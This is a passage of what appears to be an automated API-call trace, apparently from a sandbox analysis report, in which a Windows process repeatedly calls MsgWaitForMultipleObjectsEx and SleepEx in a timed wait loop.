dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.173] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.189] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.299] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.314] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.423] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.438] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.548] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.563] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.672] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.690] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.797] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.813] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.922] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0242.938] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.050] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.062] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.172] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.187] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.296] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.312] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.421] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.437] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.546] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.562] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.671] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.687] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.798] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.812] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0243.921] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0243.936] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.048] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.061] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.170] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.188] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.295] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.311] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.420] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.435] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.545] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.561] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.669] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.685] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.794] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.810] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0244.919] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0244.935] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0245.044] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0245.059] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0245.169] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0245.184] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0245.293] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0245.309] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0245.418] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0245.434] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0245.543] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0245.558] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0245.668] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0245.683] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0246.426] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0246.433] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0246.541] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0246.557] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0246.773] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0246.775] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0246.994] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.009] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.122] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.138] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.248] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.259] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.368] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.384] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.493] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.508] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.618] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.633] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.743] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.758] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.868] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0247.883] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0247.992] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.008] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.117] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.132] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.242] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.257] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.367] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.382] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.492] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.507] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.616] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.632] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.741] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.756] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.866] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0248.881] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0248.991] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.006] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.115] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.131] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.240] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.256] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.365] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.381] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.490] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.505] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.615] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.630] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.739] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.757] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.864] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0249.880] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0249.989] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.004] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.114] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.129] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.239] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.254] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.364] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.379] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.488] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.504] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.613] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.628] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.738] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.753] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.863] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0250.878] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0250.987] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.003] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.115] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.128] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.237] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.252] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.362] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.377] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.487] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.502] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.611] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.627] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.736] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.752] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.861] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0251.876] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0251.986] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.001] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.111] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.126] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.235] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.251] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.360] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.376] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.493] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.501] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.610] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.625] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.735] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.750] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0252.876] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0252.984] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.000] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.109] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.125] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.234] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.249] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.359] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.374] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.493] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.499] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.608] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.624] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.733] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.748] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.858] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.873] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.984] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0253.998] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.107] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.123] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.232] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.247] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.357] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.374] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.482] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.508] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.607] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.622] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.731] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.747] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.856] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.872] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.981] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0254.996] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.106] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.121] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.231] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.246] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.355] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.371] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.481] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.496] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.605] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.620] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.730] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.745] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.858] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.872] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.979] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0255.995] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.105] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.120] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.229] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.244] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.354] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.369] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.479] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.494] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.603] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.619] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.728] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.743] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.853] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.868] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.980] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0256.993] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.103] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.119] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.227] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.243] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.352] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.371] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.477] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.492] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.602] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.617] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.743] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.757] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.867] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0257.883] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.992] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.008] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0258.116] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0258.132] MsgWaitForMultipleObjectsEx (nCount=0x0, 